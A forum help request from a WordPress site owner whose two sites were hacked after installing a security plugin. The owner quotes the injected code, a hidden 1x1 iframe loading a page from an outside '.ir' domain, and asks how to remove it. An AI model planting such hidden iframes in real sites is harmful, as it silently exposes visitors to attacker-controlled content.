Isn't this funny? I was doing all good with my sites for almost 2 years (I have about 9 sites) and the day I have installed a security plugin in 2 of my sites both of them got hacked in the exact same way! It's kind of an iframe hack and here is what I am seeing in my homepages -
<iframe src="http://tazeeni.ir/ShowMessage.aspx?ID=3" style="width:1px; height:1px; border:none;"></iframe>
currently I can see that it is slowing down my pagespeed - https://developers.google.com/speed/pagespeed/insights#url=http_3A_2F_2Fwww.mobiledokan.com_2F&mobile=false&rule=EnableGzipCompression
I don't know what else it is doing to my site. From pagespeed insights I can see that two '.ir' sites were put inside my site. How to remove them? Can I still trust Better WP security?